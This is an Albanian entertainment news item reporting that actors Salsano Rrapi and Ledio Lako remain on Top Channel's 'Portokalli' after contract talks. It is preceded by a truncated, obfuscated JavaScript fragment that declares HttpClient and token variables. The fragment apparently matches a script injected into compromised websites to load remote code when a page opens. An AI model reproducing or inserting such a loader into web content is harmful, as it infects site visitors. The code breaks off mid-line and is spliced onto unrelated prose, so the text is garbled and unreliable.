;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dy prej aktorëve kryesorë ndërrojnë mendje, vazhdojnë me “Portokalli”

By

Sagës disa javore të thashthemeve mbi daljet në “Portokalli” I ka ardhur fundi. Janë të paktën dy prej aktorëve të përfolur si të larguar e të cilët do të qëndrojnë në program.

Fjala është për Salsano Rrapin dhe Ledio Lakon.

Teksa vetëm deri para pak ditësh, ata thumbonin të ndarë në grupe për largimin, gjërat kanë ndryshuar pas negocimit të drejtpërdrejtë me Presidenten Vjollca Hoxha.

Ka qenë Ledio ai i cili ka postuar një fotografi krah Salsanos dhe Presidentes Hoxha duke u shprehur me fjalët më të mira për pronaren e televizionit.

“Gruaja e hekurt dhe e pathyeshme. Legjenda e Top Channel” – deklaron sipër fotografisë aktori i njohur.

Besohet se kushte të përmirësuara të kontratës dhe veçanërisht rrogës kanë qenë shkaqet që i kanë bindur Salsanon dhe Ledion të mos lëvizin.

Ndërkaq, mbetet të shihet nëse i njëjti fat e pret edhe regjisorin Altin Basha, aktorin Gaz Paja dhe prezantuesen Xhemi Shehu. /prive.al

Artikuj të ngjashëm